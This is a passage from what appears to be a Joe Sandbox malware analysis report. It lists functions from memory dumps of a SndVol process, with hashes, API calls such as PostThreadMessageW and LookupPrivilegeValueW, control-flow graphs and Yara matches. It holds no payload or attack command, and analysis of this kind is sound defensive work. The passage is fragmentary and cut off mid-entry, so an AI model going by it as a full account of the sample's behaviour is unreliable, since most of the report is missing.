                                                                                                                                                  • Opcode ID: d94689650828e182fd4d608d554bbd9707a81f26b99fe71d1df9d41c27d9042b
                                                                                                                                                  • Instruction ID: ceb2d22371f3ed09b89d89266e0a9641ae7b1a3e3f4820a247fab7fb0d82fbfc
                                                                                                                                                  • Opcode Fuzzy Hash: d94689650828e182fd4d608d554bbd9707a81f26b99fe71d1df9d41c27d9042b
                                                                                                                                                  • Instruction Fuzzy Hash: BB90023124180402D5007258481474B004547D0312F59C022A2164519D8625895565B5
                                                                                                                                                  Function 365D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 83029fd75314bf0b66576629411733c5eb427d82a7dd5c7fc65ff1f084e01fd9
                                                                                                                                                  • Instruction ID: bccb1bbded8d772cce9038b262f13c381be9ab9cc7db71344374c860df687e3c
                                                                                                                                                  • Opcode Fuzzy Hash: 83029fd75314bf0b66576629411733c5eb427d82a7dd5c7fc65ff1f084e01fd9
                                                                                                                                                  • Instruction Fuzzy Hash: F39002216414004245407268884494640456BE1221759C132A1998514D8559896956A9
                                                                                                                                                  Function 365D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a4b4a25e689582d23210df7e18280bf2d6073735881b6793aa8ef1ec3703745a
                                                                                                                                                  • Instruction ID: 983fad9963fe947828a90410f800e74748faeee39b65cf7c390fdaeb5cf26791
                                                                                                                                                  • Opcode Fuzzy Hash: a4b4a25e689582d23210df7e18280bf2d6073735881b6793aa8ef1ec3703745a
                                                                                                                                                  • Instruction Fuzzy Hash: 9A90023124148802D5107258840478A004547D0311F5DC422A542461CD869589957165
                                                                                                                                                  Function 365D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: bb4b021e5d55ebd66eb2410d5fc3379b26abd0b3876f670262efea625205854c
                                                                                                                                                  • Instruction ID: a8c32417ee26eb0626b9f6999c580ba9b57145db423e2e9a671e1db5f0707974
                                                                                                                                                  • Opcode Fuzzy Hash: bb4b021e5d55ebd66eb2410d5fc3379b26abd0b3876f670262efea625205854c
                                                                                                                                                  • Instruction Fuzzy Hash: 9B90023124140402D50076985408686004547E0311F59D022A6024519EC66589956175
                                                                                                                                                  Function 365D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 935d87cdbcfd53aa85dfe1b1f8bbe8d2ac8f761014701d4f8f81969ccf39ee18
                                                                                                                                                  • Instruction ID: 65b1537eaf352e65cc73b95b7c84b657ac9ef791d052c63fccd77146bdf894c6
                                                                                                                                                  • Opcode Fuzzy Hash: 935d87cdbcfd53aa85dfe1b1f8bbe8d2ac8f761014701d4f8f81969ccf39ee18
                                                                                                                                                  • Instruction Fuzzy Hash: 4A90022925340002D5807258540864A004547D1212F99D426A101551CCC915896D5365
                                                                                                                                                  Function 365D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9a694526472751994a56a648c96a532680e54cbeb2f85eff4ce20e3f12b4b78b
                                                                                                                                                  • Instruction ID: a6048f8bc2de0ae9e346cf34e366596f2a1db6f96ccc85fce7934e87de6f172b
                                                                                                                                                  • Opcode Fuzzy Hash: 9a694526472751994a56a648c96a532680e54cbeb2f85eff4ce20e3f12b4b78b
                                                                                                                                                  • Instruction Fuzzy Hash: 6F90022134140003D54072585418646404597E1311F59D022E1414518CD915895A5266
                                                                                                                                                  Function 365D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4ab9ddc2da55b45d5e2c9f38f85c1bb3d2cd34512706aaecf0c1b917e812fb53
                                                                                                                                                  • Instruction ID: 7a047565b1da2e0f7a04dc468864b79c181b9afc217eeb6a5ccd1cd960a1c094
                                                                                                                                                  • Opcode Fuzzy Hash: 4ab9ddc2da55b45d5e2c9f38f85c1bb3d2cd34512706aaecf0c1b917e812fb53
                                                                                                                                                  • Instruction Fuzzy Hash: AC900221282441525945B2584404547404657E0251799C023A2414914C8526995AD665
                                                                                                                                                  Function 365D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 515ed6545df61b0313b6428ac55b4dd74197d3dac45bc1af7d3420bd60be9254
                                                                                                                                                  • Instruction ID: 1a3f72d69ad521038925a89736dd92978110e07c27f898b4a7d430d9455308da
                                                                                                                                                  • Opcode Fuzzy Hash: 515ed6545df61b0313b6428ac55b4dd74197d3dac45bc1af7d3420bd60be9254
                                                                                                                                                  • Instruction Fuzzy Hash: 1690023124140413D51172584504747004947D0251F99C423A142451CD96568A56A165
                                                                                                                                                  Function 365D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4105c96180475afdac73daccb2fb1fc7d76ef5fc7ac797e9feb14862d9c41240
                                                                                                                                                  • Instruction ID: 3028be00cf4323e883c8f89e77aca4f51b096e074a5cfe95935f0539dce248c0
                                                                                                                                                  • Opcode Fuzzy Hash: 4105c96180475afdac73daccb2fb1fc7d76ef5fc7ac797e9feb14862d9c41240
                                                                                                                                                  • Instruction Fuzzy Hash: BF900435351400030505F75C070454700C747D537135DC033F3015514CD731CD755175
                                                                                                                                                  Function 365D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1995da2e49ecd3264b1d077fc24dfa9c1d2a831eda1e8189dfa7b0d38aad8232
                                                                                                                                                  • Instruction ID: af63766fae92ec6d94bb555f28a52992f452c661c7e36af7f7e2166aeaab7401
                                                                                                                                                  • Opcode Fuzzy Hash: 1995da2e49ecd3264b1d077fc24dfa9c1d2a831eda1e8189dfa7b0d38aad8232
                                                                                                                                                  • Instruction Fuzzy Hash: 7A90026124240003450572584414656404A47E0211B59C032E2014554DC52589956169
                                                                                                                                                  Function 365D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c8ef4c9191584283d118c0b284c3c8bcb3ecf3db502cd5cd31ac08c6900cb20c
                                                                                                                                                  • Instruction ID: 996da536dc9329e068636912cf7064364646ef9d5b4743e884f6c02fb9423515
                                                                                                                                                  • Opcode Fuzzy Hash: c8ef4c9191584283d118c0b284c3c8bcb3ecf3db502cd5cd31ac08c6900cb20c
                                                                                                                                                  • Instruction Fuzzy Hash: BA90023124140802D5807258440468A004547D1311F99C026A1025618DCA158B5D77E5
                                                                                                                                                  Function 047C9AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4420c206828458349f6d905d6a249316b3838500a4ccb7f37ceacb7ee7c399b1
                                                                                                                                                  • Instruction ID: 584eb8c1729483d03b53a9a6042d3374bdec1a0ee691423993104cc072f1cc4b
                                                                                                                                                  • Opcode Fuzzy Hash: 4420c206828458349f6d905d6a249316b3838500a4ccb7f37ceacb7ee7c399b1
                                                                                                                                                  • Instruction Fuzzy Hash: 0B2107F3D402096BDB25DA64AD51BFF73BCAB40304F04046DEA4993240F634BA49CBA2
                                                                                                                                                  Function 047C8309 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 401 47c8309-47c831f 402 47c8328-47c835a call 47dc9d0 call 47cacf0 call 47d4e50 401->402 403 47c8323 call 47dbe30 401->403 410 47c835c-47c836e PostThreadMessageW 402->410 411 47c838e-47c8392 402->411 403->402 412 47c838d 410->412 413 47c8370-47c838a call 47ca480 410->413 412->411 413->412
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 047C836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 0afa5f4c9209535b8e8b25869164ad7ee234cf89bc299eb541bc8de9390bfa96
                                                                                                                                                  • Instruction ID: 8955ff9adf202667549342218360e87aff7ce04ca9117dd48b034cc0ccb21210
                                                                                                                                                  • Opcode Fuzzy Hash: 0afa5f4c9209535b8e8b25869164ad7ee234cf89bc299eb541bc8de9390bfa96
                                                                                                                                                  • Instruction Fuzzy Hash: 5A01D831A902297BF721AAA49C06FFE776C5B40F55F05011DFF04BB2C0E6A4750647E6
                                                                                                                                                  Function 047C8310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 416 47c8310-47c835a call 47dbe30 call 47dc9d0 call 47cacf0 call 47d4e50 425 47c835c-47c836e PostThreadMessageW 416->425 426 47c838e-47c8392 416->426 427 47c838d 425->427 428 47c8370-47c838a call 47ca480 425->428 427->426 428->427
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 047C836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 1e7cadd667d1187d95f5ac89d1dcc6b80261ede2748510a503934ad0d49504a3
                                                                                                                                                  • Instruction ID: 2f594f5bc6eea6772db070de15469172838763fcf22e465d5a3d719af56a3d75
                                                                                                                                                  • Opcode Fuzzy Hash: 1e7cadd667d1187d95f5ac89d1dcc6b80261ede2748510a503934ad0d49504a3
                                                                                                                                                  • Instruction Fuzzy Hash: 0301A231A9022C7BF721AAA49C06FBE776C5B40F56F05011DFF04BA2C1E6A47A0647F6
                                                                                                                                                  Function 047DA634 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 444 47da634-47da639 445 47da65c-47da671 RtlFreeHeap 444->445 446 47da63b 444->446 447 47da63d-47da656 446->447 448 47da5f8-47da5fd 446->448 447->445 451 47da657 call 47daf30 447->451 451->445
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,047C9CF3,?,?,047C9CF3,00000060,00000000,00000000,?,?,047C9CF3,?,00000000), ref: 047DA66D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: e4974ab823a85595f962e28643802d9eb947f98dc2dd8b8446c72d31562148ed
                                                                                                                                                  • Instruction ID: 51b207bc82d653ae84b4c12b4360516586838729dc4e969b29628645f1670868
                                                                                                                                                  • Opcode Fuzzy Hash: e4974ab823a85595f962e28643802d9eb947f98dc2dd8b8446c72d31562148ed
                                                                                                                                                  • Instruction Fuzzy Hash: 85F0A7B26102056BDB18EFA4DC08DAB73A8EF84374F104A46F93D97290D630E55087B0
                                                                                                                                                  Function 047DA745 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 452 47da745-47da749 453 47da74b-47da74e 452->453 454 47da79a-47da7ba call 47daf30 452->454 453->454 456 47da7bf-47da7d4 LookupPrivilegeValueW 454->456
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 84f84b0dfdd374083061d9077a8938e4343f96ea143d37fdcdc266e121c1f025
                                                                                                                                                  • Instruction ID: 6ae93069d456ec16f15acd5ddb10dadc5aac7450426ce489bbb972a96103e9c7
                                                                                                                                                  • Opcode Fuzzy Hash: 84f84b0dfdd374083061d9077a8938e4343f96ea143d37fdcdc266e121c1f025
                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0A0B2610204AFDB20CF64C880FDB7B79FF952A4F258665F94997241C674A806CBB0
                                                                                                                                                  Function 047DA792 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 460 47da792-47da7b9 461 47da7bf-47da7d4 LookupPrivilegeValueW 460->461 462 47da7ba call 47daf30 460->462 462->461
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 033013033e639f2d5d2cec0f9a7fe6d96653ba39a9c9efe6094afb72df0ea76f
                                                                                                                                                  • Instruction ID: 761be1b8d73fe691cc93ec7c06346bda7ba16b0e539ad93fefcfd21d6f4ff159
                                                                                                                                                  • Opcode Fuzzy Hash: 033013033e639f2d5d2cec0f9a7fe6d96653ba39a9c9efe6094afb72df0ea76f
                                                                                                                                                  • Instruction Fuzzy Hash: 9CF0A0B66002086BDB24DF65CC84EEB3B79EF49254F104294F98C67242C631E801CBA1
                                                                                                                                                  Function 047DA640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 466 47da640-47da671 call 47daf30 RtlFreeHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,047C9CF3,?,?,047C9CF3,00000060,00000000,00000000,?,?,047C9CF3,?,00000000), ref: 047DA66D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction ID: ddb9dd3b063ee227ad257dd1bab957ec12a2bc0f2b9b047854e859f02a9fe7f7
                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction Fuzzy Hash: 67E046B1220208ABDB18EF99CC48EA777ACEF88754F018599FE085B341C630F910CAF0
                                                                                                                                                  Function 047DA600 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 463 47da600-47da631 call 47daf30 RtlAllocateHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(047D4536,?,047D4CAF,047D4CAF,?,047D4536,?,?,?,?,?,00000000,047C9CF3,?), ref: 047DA62D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction ID: 6091a069773e2eee35dd2dabef591ff96170da529bb643e092cd8b26cdf9d42a
                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                  • Instruction Fuzzy Hash: 29E012B1220208ABDB18EF99CC44EA777ACEF88654F118599FA085B241C630F9118AB0
                                                                                                                                                  Function 047DA7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,047CF1D2,047CF1D2,0000003C,00000000,?,047C9D65), ref: 047DA7D0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction ID: 7f82849eb85c9ebf6c911e7ac3a6575e0f2aad1b0d0723d0db2abece6d1a1f2c
                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
